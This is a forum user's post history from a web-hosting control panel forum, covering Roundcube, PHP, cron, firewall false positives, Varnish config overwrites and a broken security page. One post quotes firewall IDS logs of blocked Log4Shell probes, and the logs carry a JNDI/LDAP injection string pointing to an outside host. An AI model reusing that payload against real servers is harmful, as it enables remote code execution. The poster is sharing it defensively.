Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - tomkolp

Pages: [1]
1
E-Mail / Re: Roundcube update not working due to php version of cwpsrv
« on: January 13, 2023, 12:10:54 PM »
Cwpsrv has it's own fpm.  the service is called cwpsrv-phpfpm and cwp-phpfpm  They use /usr/local/cwp/php71 (It's actually 7.2).  I'm working on an update for you, but work 60 hours a week, so not a lot of time
Do you know when the new version of Roundcube will be available? How to completely disable Roundcube in CWP when CVE vulnerabilities appear in outdated version 1.5.3

2
How to / Re: Cronjob for WPallimport
« on: August 09, 2022, 09:48:37 AM »
I use curl and it works. Connect via ssh and type in the console, or show the cron logs.

3
I wanted to update roundcube to 1.6 but roundcube requires a minimum php 7.3 version. Unfortunately version 1.5.3 is the last one working.

4
CSF Firewall / Re: lfd: (WPLOGIN) WP Login Attack (false positives)
« on: May 14, 2022, 12:18:55 PM »
I have the same problem.  My wordpress has an additional security of 2fa.  Therefore, each login generates two entries.  Just log in-> log out-> log in again to be blocked.  Preventing my country from being blocked is not a good solution.

5
Hi friends ...

We have had some problems with varnish ...
----------------------------------------------------
Error 503 Backend fetch failed

Backend fetch failed
Guru Meditation:

XID: 1279924
----------------------------------------------------

we use webserver configuration nginx-varnish-apache-php-fpm...
after some study/investigation of internet we found recomendations some changes in config files ...

we have added them to the files in: /etc/varnish/default.vcl
and we have added them have updated files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl


then we have updated all domains in CWP > WebServers Domain Conf
And all changes  from default.vcl or default.tpl were updated in files in all fomain files: /etc/varnish/conf.d/vhosts

After this was everything OK and Error 503 Backend fetch failed .... they came only very rarely ....


But the biggest that after some time (may be after CWP update) the config files were rewrited to old ones ...
files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl
and
all fomain files: /etc/varnish/conf.d/vhosts

all our changes were lost ...

Please why ???

we think that it is very BAD!!!

CAn you do something with this ???

Thank

Juraj
I have the same problem with varnish, can I ask for information what should be changed in these templates?

6
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:40:31 AM »
External firewall

7
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:15:44 AM »
I attach to the question. I also do not know if cwp is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
Code: [Select]
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}

8
CentOS-WebPanel GUI / Re: Security incidents will not load
« on: November 29, 2021, 07:13:29 AM »
Security incidents will not load in CWPpro version: 0.9.8.1102
Code: [Select]
Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at HTMLDocument.<anonymous> (index.php?module=security_center:2881)
    at n (js.php:2)
    at Object.fireWith (js.php:2)
    at Function.ready (js.php:2)
    at HTMLDocument.B (js.php:2)

9
CentOS-WebPanel GUI / Security incidents will not load
« on: November 23, 2021, 12:53:39 PM »
Security incidents will not load in CWPpro version: 0.9.8.1102

Pages: [1]